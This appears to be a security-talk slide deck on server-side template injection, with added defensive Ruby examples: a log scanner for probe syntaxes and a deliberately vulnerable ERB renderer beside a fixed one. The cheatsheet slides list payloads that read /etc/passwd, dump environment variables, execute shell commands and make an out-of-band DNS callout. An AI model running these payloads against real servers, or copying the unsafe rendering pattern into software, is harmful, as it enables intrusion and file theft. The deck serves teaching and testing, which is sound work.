Slide 1

Server Side Template Injection

Slide 2

Whoami
Dhamotharan
Offensive Web Application Security Researcher
Occasional bug bounty hunter on HackerOne, Bugcrowd, etc.
Dhamu_offi on Twitter

Slide 3

AGENDA
● Template Injection
● What is SSTI
● Methodology
● Automated Tools
● Cheatsheet
● Demo

Slide 4

Template Injection
Template injection allows an attacker to include template code in an existing (or not yet existing) template. A template engine makes designing HTML pages easier by using static template files in which, at runtime, variables/placeholders are replaced with actual values in the HTML pages.

Slide 5

Template Injection
Template engines are designed to combine templates with a data model to produce result documents, which helps populate web pages with dynamic data. Template engines can be used to display information about users, products, etc. Some of the most popular template engines are:
● PHP – Smarty, Twig
● Java – Velocity, FreeMarker
● Python – Jinja, Mako, Tornado
● JavaScript – Jade, Rage
● Ruby – Liquid

Slide 6

Server Side Template Injection (SSTI)
Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server side.

Slide 7

SSTI
Server-side template injection is a vulnerability where the attacker injects malicious input into a template to execute commands on the server side. This vulnerability occurs when unvalidated user input is embedded directly into the template that the engine renders, which can generally lead to remote code execution (RCE).

Slide 8

Common probe expressions:
  ${7*7}
  ${{7*7}}
  #{ 7 * 7 }
  <%= 7 * 7 %>
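The four probe syntaxes above are exactly what a defender should be looking for in request parameters. The following is an added example, not part of the original deck: a small Ruby script that pulls the query string out of Common Log Format access-log lines, URL-decodes each parameter (probes arrive percent-encoded) and flags any value that contains one of these template-expression syntaxes. The log lines are constructed for the example; the engine families named in the comments are the usual users of each syntax, not a fingerprint.

```ruby
require 'uri'

# Template-expression syntaxes used by the probes on this slide.
# (Engine families in the comments are common users of the syntax, not a fingerprint.)
PROBE_PATTERNS = {
  'dollar_brace' => /\$\{[^}]*\}/,    # ${7*7}, ${{7*7}}  (Smarty, FreeMarker, Java EL, Mako)
  'double_brace' => /\{\{[^}]*\}\}/,  # {{7*7}}           (Jinja, Twig, Handlebars)
  'hash_brace'   => /#\{[^}]*\}/,     # #{ 7 * 7 }        (Slim, JSF EL)
  'erb_tag'      => /<%=?[^%]*%>/     # <%= 7 * 7 %>      (ERB, JSP)
}.freeze

# Constructed sample access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?username=alice HTTP/1.1" 200 512
  10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?username=%24%7B7*7%7D HTTP/1.1" 200 480
  10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?greeting=%7B%7B7*7%7D%7D HTTP/1.1" 200 480
  10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?username=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 490
  10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?username=bob%40example.com HTTP/1.1" 200 512
LOG

# Extracts the query string from the request line and URL-decodes it into a
# {param => value} hash. Decoding matters: the regexes must see the raw syntax.
def query_params(line)
  m = line.match(/"(?:GET|POST|PUT|PATCH|DELETE) \S*?\?(\S*) HTTP\//)
  return {} unless m
  URI.decode_www_form(m[1]).to_h
rescue ArgumentError # malformed percent-encoding: treat as no parameters
  {}
end

# Returns the name of the first probe syntax found in a decoded value, or nil.
def classify(value)
  PROBE_PATTERNS.each { |name, re| return name if value.match?(re) }
  nil
end

# Walks the log and returns one hit per parameter that carries a probe syntax.
def scan_log(log)
  log.each_line.with_index(1).flat_map do |line, number|
    ip = line[/\A\S+/]
    query_params(line).map do |param, value|
      syntax = classify(value)
      syntax && { line: number, ip: ip, param: param, value: value, syntax: syntax }
    end.compact
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |hit|
    puts "line #{hit[:line]} #{hit[:ip]} param=#{hit[:param]} syntax=#{hit[:syntax]} value=#{hit[:value].inspect}"
  end
end
```

Running it reports lines 2, 3 and 4; the ordinary values `alice` and `bob@example.com` produce no hit. The same `classify` check can be applied to decoded parameters in a WAF rule or a request-logging middleware before the value ever reaches a template.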

Slide 9

Server Side Template Injection Methodology

Slide 10

Methodology
➔ Detect
➔ Identify
➔ Exploit

Slide 11

Detect
This vulnerability can appear in two distinct contexts, each of which requires its own detection method:
1. Plaintext context
2. Code context
Example (story for illustration purposes only):
  smarty=Hello {user.name}      →  Hello user1
  smarty=Hello ${7*7}           →  Hello 49
  personal_greeting=username    →  Hello user0

Slide 12

Plaintext context
The given input is rendered and reflected into the response. Try placing mathematical operations inside a template expression:
  render('Hello ' + username)
  http://vulnerable-website.com/?username=${7*7}
Probe payloads:
  {{7*7}}
  ${7*7}
  <%= 7*7 %>
  ${{7*7}}

Slide 13

Code context
In these cases the user input is placed inside an existing template expression:
  greeting = getQueryParameter('greeting')
  engine.render("Hello {{" + greeting + "}}", data)
  http://vulnerable-website.com/?greeting=data.username}}
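Both contexts from slides 12 and 13 come down to the same developer mistake: user input becomes part of the template source instead of being passed to the engine as data. The following is an added example, not code from the deck, that reproduces both patterns with Ruby's standard-library ERB engine and shows the fix. The function names and the greeting template are assumptions for the example.

```ruby
require 'erb'

# VULNERABLE (plaintext context, slide 12): the user's string is concatenated
# into the template *source*, so any <%= ... %> it contains is run by ERB.
def render_unsafe(username)
  ERB.new("Hello " + username).result(binding)
end

# VULNERABLE (code context, slide 13): the input lands *inside* an expression
# tag, so no tag characters are needed at all; "7 * 7" is already code here.
def render_unsafe_code_context(expr)
  ERB.new("Hello <%= " + expr + " %>").result(binding)
end

# FIXED: the template source is a constant written by the developer. User data
# reaches the engine only as a *value* bound to a variable, and it is HTML-escaped
# on output so it cannot be interpreted as markup either.
SAFE_TEMPLATE = ERB.new("Hello <%= ERB::Util.html_escape(username) %>")

def render_safe(username)
  SAFE_TEMPLATE.result_with_hash(username: username)
end

if __FILE__ == $PROGRAM_NAME
  probe = "<%= 7 * 7 %>"                       # the ERB probe from the cheatsheet
  puts render_unsafe(probe)                    # Hello 49  (engine evaluated the input)
  puts render_unsafe_code_context("7 * 7")     # Hello 49  (no tag needed in code context)
  puts render_safe(probe)                      # Hello &lt;%= 7 * 7 %&gt;  (literal text)
end
```

The "Hello 49" response is the detection signal from the Detect step; the safe version answers with the probe as escaped text, which is the behaviour a code review should look for: a template literal that never changes shape based on request data.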

Slide 14

Identify
Once template injection potential has been detected, the next step is to identify the template engine in use. Although there are a huge number of templating languages, many of them use very similar syntax that is specifically chosen not to clash with HTML characters. As a result, it can be relatively simple to create probing payloads to test which template engine is being used.

Slide 15

No content

Slide 16

Exploit
This step uses real template engines to show the exploit methodology in practice and to make a case for the severity of the issue. The findings may appear to show flaws in the template engines themselves, but unless an engine markets itself as suitable for user-submitted templates, the responsibility for preventing template injection ultimately lies with the web application developers. Useful reading when assessing an engine:
● Lists of built-in methods, functions, filters, and variables.
● Lists of extensions/plugins – some may be enabled by default.

Slide 17

Exploit – Generic
In this wordlist you can find variables defined in the environments of some of the engines mentioned in this deck:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-special-vars.txt
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

Slide 18

Automated Tools
Tplmap assists in the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with several sandbox escape techniques to get access to the underlying operating system. The tool and its test suite are developed to research the SSTI vulnerability class and to be used as offensive security tools during web application penetration tests.

Slide 19

No content

Slide 20

No content

Slide 21

No content

Slide 22

CheatSheet
● Ruby
  ○ Basic injections
  ○ Retrieve /etc/passwd
  ○ List files and directories
● Java
  ○ Basic injection
  ○ Retrieve the system’s environment variables
  ○ Retrieve /etc/passwd
● Expression Language (EL)
  ○ Basic injection
  ○ Code execution

Slide 23

Ruby - Basic injections
  ERB:  <%= 7 * 7 %>
  Slim: #{ 7 * 7 }
Ruby - Retrieve /etc/passwd
  <%= File.open('/etc/passwd').read %>
Ruby - List files and directories
  <%= Dir.entries('/') %>

Slide 24

Java - Basic injection
  ${7*7}
  ${class.getClassLoader()}
Java - Retrieve the system’s environment variables
  ${T(java.lang.System).getenv()}
Java - Retrieve /etc/passwd
  ${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}

Slide 25

Expression Language (EL)
Expression Language EL - Basic injection
  ${1+1}
  #{1+1}
Expression Language EL - One-liner injections not including code execution
  // DNS lookup
  ${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","xxxxxxxxxxxxxx.burpcollaborator.net")}

Slide 26

Demo

Slide 27

No content

Slide 28

No content

Slide 29

No content

Slide 30

No content

Slide 31

Server-Side-Template-Injection - Linux - Privilege Escalation
https://github.com/Dhamuharker/Server-Side-Template-Injection

Slide 32

Thank you